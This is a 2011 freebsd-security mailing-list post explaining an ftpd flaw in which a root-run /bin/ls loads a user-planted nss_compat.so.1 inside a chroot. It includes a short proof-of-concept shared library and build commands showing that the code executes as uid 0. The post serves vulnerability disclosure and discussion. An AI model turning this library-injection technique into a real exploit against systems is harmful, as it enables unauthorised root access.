ftpd security issue ?

Przemyslaw Frasunek przemyslaw at frasunek.com
Wed Nov 30 21:09:17 UTC 2011

> Saw this on FD... Anyone know any more details about this ?
> http://lists.grok.org.uk/pipermail/full-disclosure/2011-November/084372.html

This is a well known hazard of chrooting to directories controlled by
unprivileged users. In this case, vulnerability exists because ftpd calls
/bin/ls with uid=0 and euid!=0 when STAT command is issued, and nss_compat.so is
loaded by libc regardless of elevated privileges.

This can be proven by creating dummy ~/lib/nss_compat.so.1:

[venglin at lagoon ~/lib]$ cat dummy.c
#include <stdio.h>
#include <fcntl.h>

void _init() {
        FILE *fp = fopen("asdf", "w+");
        fprintf(fp, "%d %d\n", getuid(), geteuid());
[venglin at lagoon ~/lib]$ cc -o dummy.o -c dummy.c -fPIC
  [venglin at lagoon ~/lib]$ cc -shared -Wl,-soname,dummy.so -o dummy.so dummy.o
[venglin at lagoon ~/lib]$ mv dummy.so nss_compat.so.1

And after calling STAT command:

[venglin at lagoon ~/lib]$ cat ~/asdf
0 3000

BTW. This vulnerability affects only configurations, where /etc/ftpchroot exists
or anonymous user is allowed to create files inside etc and lib dirs.

* Fido: 2:480/124 ** WWW: http://www.frasunek.com ** NICHDL: PMF9-RIPE *
* Jabber ID: venglin at nette.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ5JIV *

More information about the freebsd-security mailing list